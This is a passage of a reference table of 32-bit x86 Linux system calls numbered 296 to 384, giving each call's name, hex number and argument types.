| 296 | mkdirat | 0x128 | int dfd | const char * pathname | umode_t mode | - | - | - |
| 297 | mknodat | 0x129 | int dfd | const char * filename | umode_t mode | unsigned dev | - | - |
| 298 | fchownat | 0x12a | int dfd | const char *filename | uid_t user | gid_t group | int flag | - |
| 299 | futimesat | 0x12b | int dfd | const char *filename | struct timeval *utimes | - | - | - |
| 300 | fstatat64 | 0x12c | int dfd | const char *filename | struct stat64 *statbuf | int flag | - | - |
| 301 | unlinkat | 0x12d | int dfd | const char * pathname | int flag | - | - | - |
| 302 | renameat | 0x12e | int olddfd | const char * oldname | int newdfd | const char * newname | - | - |
| 303 | linkat | 0x12f | int olddfd | const char *oldname | int newdfd | const char *newname | int flags | - |
| 304 | symlinkat | 0x130 | const char * oldname | int newdfd | const char * newname | - | - | - |
| 305 | readlinkat | 0x131 | int dfd | const char *path | char *buf | int bufsiz | - | - |
| 306 | fchmodat | 0x132 | int dfd | const char * filename | umode_t mode | - | - | - |
| 307 | faccessat | 0x133 | int dfd | const char *filename | int mode | - | - | - |
| 308 | pselect6 | 0x134 | int | fd_set * | fd_set * | fd_set * | struct timespec * | void * |
| 309 | ppoll | 0x135 | struct pollfd * | unsigned int | struct timespec * | const sigset_t * | size_t | - |
| 310 | unshare | 0x136 | unsigned long unshare_flags | - | - | - | - | - |
| 311 | set_robust_list | 0x137 | struct robust_list_head *head | size_t len | - | - | - | - |
| 312 | get_robust_list | 0x138 | int pid | struct robust_list_head * *head_ptr | size_t *len_ptr | - | - | - |
| 313 | splice | 0x139 | int fd_in | loff_t *off_in | int fd_out | loff_t *off_out | size_t len | unsigned int flags |
| 314 | sync_file_range | 0x13a | int fd | loff_t offset | loff_t nbytes | unsigned int flags | - | - |
| 315 | tee | 0x13b | int fdin | int fdout | size_t len | unsigned int flags | - | - |
| 316 | vmsplice | 0x13c | int fd | const struct iovec *iov | unsigned long nr_segs | unsigned int flags | - | - |
| 317 | move_pages | 0x13d | pid_t pid | unsigned long nr_pages | const void * *pages | const int *nodes | int *status | int flags |
| 318 | getcpu | 0x13e | unsigned *cpu | unsigned *node | struct getcpu_cache *cache | - | - | - |
| 319 | epoll_pwait | 0x13f | int epfd | struct epoll_event *events | int maxevents | int timeout | const sigset_t *sigmask | size_t sigsetsize |
| 320 | utimensat | 0x140 | int dfd | const char *filename | struct timespec *utimes | int flags | - | - |
| 321 | signalfd | 0x141 | int ufd | sigset_t *user_mask | size_t sizemask | - | - | - |
| 322 | timerfd_create | 0x142 | int clockid | int flags | - | - | - | - |
| 323 | eventfd | 0x143 | unsigned int count | - | - | - | - | - |
| 324 | fallocate | 0x144 | int fd | int mode | loff_t offset | loff_t len | - | - |
| 325 | timerfd_settime | 0x145 | int ufd | int flags | const struct __kernel_itimerspec *utmr | struct __kernel_itimerspec *otmr | - | - |
| 326 | timerfd_gettime | 0x146 | int ufd | struct __kernel_itimerspec *otmr | - | - | - | - |
| 327 | signalfd4 | 0x147 | int ufd | sigset_t *user_mask | size_t sizemask | int flags | - | - |
| 328 | eventfd2 | 0x148 | unsigned int count | int flags | - | - | - | - |
| 329 | epoll_create1 | 0x149 | int flags | - | - | - | - | - |
| 330 | dup3 | 0x14a | unsigned int oldfd | unsigned int newfd | int flags | - | - | - |
| 331 | pipe2 | 0x14b | int *fildes | int flags | - | - | - | - |
| 332 | inotify_init1 | 0x14c | int flags | - | - | - | - | - |
| 333 | preadv | 0x14d | unsigned long fd | const struct iovec *vec | unsigned long vlen | unsigned long pos_l | unsigned long pos_h | - |
| 334 | pwritev | 0x14e | unsigned long fd | const struct iovec *vec | unsigned long vlen | unsigned long pos_l | unsigned long pos_h | - |
| 335 | rt_tgsigqueueinfo | 0x14f | pid_t tgid | pid_t pid | int sig | siginfo_t *uinfo | - | - |
| 336 | perf_event_open | 0x150 | struct perf_event_attr *attr_uptr | pid_t pid | int cpu | int group_fd | unsigned long flags | - |
| 337 | recvmmsg | 0x151 | int fd | struct mmsghdr *msg | unsigned int vlen | unsigned flags | struct timespec *timeout | - |
| 338 | fanotify_init | 0x152 | unsigned int flags | unsigned int event_f_flags | - | - | - | - |
| 339 | fanotify_mark | 0x153 | int fanotify_fd | unsigned int flags | u64 mask | int fd | const char *pathname | - |
| 340 | prlimit64 | 0x154 | pid_t pid | unsigned int resource | const struct rlimit64 *new_rlim | struct rlimit64 *old_rlim | - | - |
| 341 | name_to_handle_at | 0x155 | int dfd | const char *name | struct file_handle *handle | int *mnt_id | int flag | - |
| 342 | open_by_handle_at | 0x156 | int mountdirfd | struct file_handle *handle | int flags | - | - | - |
| 343 | clock_adjtime | 0x157 | clockid_t which_clock | struct timex *tx | - | - | - | - |
| 344 | syncfs | 0x158 | int fd | - | - | - | - | - |
| 345 | sendmmsg | 0x159 | int fd | struct mmsghdr *msg | unsigned int vlen | unsigned flags | - | - |
| 346 | setns | 0x15a | int fd | int nstype | - | - | - | - |
| 347 | process_vm_readv | 0x15b | pid_t pid | const struct iovec *lvec | unsigned long liovcnt | const struct iovec *rvec | unsigned long riovcnt | unsigned long flags |
| 348 | process_vm_writev | 0x15c | pid_t pid | const struct iovec *lvec | unsigned long liovcnt | const struct iovec *rvec | unsigned long riovcnt | unsigned long flags |
| 349 | kcmp | 0x15d | pid_t pid1 | pid_t pid2 | int type | unsigned long idx1 | unsigned long idx2 | - |
| 350 | finit_module | 0x15e | int fd | const char *uargs | int flags | - | - | - |
| 351 | sched_setattr | 0x15f | pid_t pid | struct sched_attr *attr | unsigned int flags | - | - | - |
| 352 | sched_getattr | 0x160 | pid_t pid | struct sched_attr *attr | unsigned int size | unsigned int flags | - | - |
| 353 | renameat2 | 0x161 | int olddfd | const char *oldname | int newdfd | const char *newname | unsigned int flags | - |
| 354 | seccomp | 0x162 | unsigned int op | unsigned int flags | const char *uargs | - | - | - |
| 355 | getrandom | 0x163 | char *buf | size_t count | unsigned int flags | - | - | - |
| 356 | memfd_create | 0x164 | const char *uname_ptr | unsigned int flags | - | - | - | - |
| 357 | bpf | 0x165 | int cmd | union bpf_attr *attr | unsigned int size | - | - | - |
| 358 | execveat | 0x166 | int dfd | const char *filename | const char *const *argv | const char *const *envp | int flags | - |
| 359 | socket | 0x167 | int | int | int | - | - | - |
| 360 | socketpair | 0x168 | int | int | int | int * | - | - |
| 361 | bind | 0x169 | int | struct sockaddr * | int | - | - | - |
| 362 | connect | 0x16a | int | struct sockaddr * | int | - | - | - |
| 363 | listen | 0x16b | int | int | - | - | - | - |
| 364 | accept4 | 0x16c | int | struct sockaddr * | int * | int | - | - |
| 365 | getsockopt | 0x16d | int fd | int level | int optname | char *optval | int *optlen | - |
| 366 | setsockopt | 0x16e | int fd | int level | int optname | char *optval | int optlen | - |
| 367 | getsockname | 0x16f | int | struct sockaddr * | int * | - | - | - |
| 368 | getpeername | 0x170 | int | struct sockaddr * | int * | - | - | - |
| 369 | sendto | 0x171 | int | void * | size_t | unsigned | struct sockaddr * | int |
| 370 | sendmsg | 0x172 | int fd | struct user_msghdr *msg | unsigned flags | - | - | - |
| 371 | recvfrom | 0x173 | int | void * | size_t | unsigned | struct sockaddr * | int * |
| 372 | recvmsg | 0x174 | int fd | struct user_msghdr *msg | unsigned flags | - | - | - |
| 373 | shutdown | 0x175 | int | int | - | - | - | - |
| 374 | userfaultfd | 0x176 | int flags | - | - | - | - | - |
| 375 | membarrier | 0x177 | int cmd | int flags | - | - | - | - |
| 376 | mlock2 | 0x178 | unsigned long start | size_t len | int flags | - | - | - |
| 377 | copy_file_range | 0x179 | int fd_in | loff_t *off_in | int fd_out | loff_t *off_out | size_t len | unsigned int flags |
| 378 | preadv2 | 0x17a | unsigned long fd | const struct iovec *vec | unsigned long vlen | unsigned long pos_l | unsigned long pos_h | rwf_t flags |
| 379 | pwritev2 | 0x17b | unsigned long fd | const struct iovec *vec | unsigned long vlen | unsigned long pos_l | unsigned long pos_h | rwf_t flags |
| 380 | pkey_mprotect | 0x17c | unsigned long start | size_t len | unsigned long prot | int pkey | - | - |
| 381 | pkey_alloc | 0x17d | unsigned long flags | unsigned long init_val | - | - | - | - |
| 382 | pkey_free | 0x17e | int pkey | - | - | - | - | - |
| 383 | statx | 0x17f | int dfd | const char *path | unsigned flags | unsigned mask | struct statx *buffer | - |
| 384 | arch_prctl | 0x180 | ? | ? | ? | ? | ? | ? |
